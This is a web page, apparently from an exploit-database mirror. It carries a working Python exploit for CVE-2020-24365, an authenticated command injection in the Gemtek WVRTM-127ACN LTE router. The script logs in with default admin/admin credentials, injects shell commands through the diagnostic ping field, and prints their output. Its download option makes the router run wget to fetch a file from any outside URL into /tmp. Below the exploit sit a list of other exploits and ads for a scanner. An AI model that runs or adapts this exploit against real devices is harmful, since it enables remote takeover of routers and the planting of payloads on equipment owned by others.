gemtek wvrtm127acn 01.01.02.141 authenticated arbitrary command injection

▸▸▸ Exploit & Vulnerability >> webapps exploit & cgi vulnerability

Online Vulnerability Scanner Tools

Code...

				
# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection 
# Date: 13/09/2020                                         
# Exploit Author: Gabriele Zuddas                         
# Version: 01.01.02.127, 01.01.02.141                      
# CVE : CVE-2020-24365                                     


Service Provider : 	Linkem
Product Name : 	LTE CPE
Model ID : 	WVRTM-127ACN
Serial ID :	GMK170418011089
IMEI : 	XXXXXXXXXXXXX
ICCID : 	XXXXXXXXXXXXXXXXXX
Firmware Version : 	01.01.02.141
Firmware Creation Date : 	May 15 13:04:30 CST 2019
Bootrom Version : 	U-Boot 1.1.3
Bootrom Creation Date : 	Oct 23 2015 - 16:03:05
LTE Support Band : 	42,43


Injecting happens here:

sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&


Exploit has been tested on older verions too:
    Firmware Version: 	01.01.02.127
    Firmware Creation Date : 	May 23 15:34:10 CST 2018

"""

import requests, time, argparse, re, sys

class Exploit():
    
    CVE = "CVE-2020-24365"
    
    def __init__(self, args):
        self.args = args
        self.session = requests.Session()
    
    def login(self):
        s = self.session
        r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
        if "sid" not in s.cookies:
            print("[!] Login failed.")
            exit(1)
        sid = s.cookies["sid"]
        s.headers = {"sid": sid}
        print(f"[*] Login successful! (sid={sid})")
    
    def now(self):
        return int(time.time() * 1000)

    def exploit(self, command):
        self.login()
        
        with self.session as s:
            payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"
            
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")

            #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")
            
            #TODO: eventually parse content with regex to clean out the output
            c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
            print(content)
            print(c[0])
            
            if len(c) > 0:
                return c[0]
            else:
                return False

    def download_file(self, url):
        filename = url.rsplit('/', 1)[-1]
        
        if self.args.file is not None:
            print(f"[*] Attempting download of file '{filename}' from {url} ...")
    
            if self.exploit(f"wget {url} -O /tmp/{filename}"):
                print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")
                print(self.exploit(f"du -h /tmp/{filename}"))
                return True
            else:
                print(f"[!] Failed to download {filename} from {url}")
                return False

    def run(self):
        if self.args.command is not None:
            print(self.exploit(self.args.command))
            exit()
        if self.args.file is not None:
            self.download_file(self.args.file)
            exit()

if __name__ == "__main__":
    # Create the parser and add arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
    
    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")

    args = parser.parse_args()

    # Run exploit
    X = Exploit(args)
    if len(sys.argv) > 1:
        print(f"[*] Exploiting {X.CVE} ...")
        X.run()
    else:
        parser.print_help(sys.stderr)

Gemtek wvrtm127acn 01.01.02.141 authenticated arbitrary command injection Vulnerability / Exploit Source : Gemtek wvrtm127acn 01.01.02.141 authenticated arbitrary command injection

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.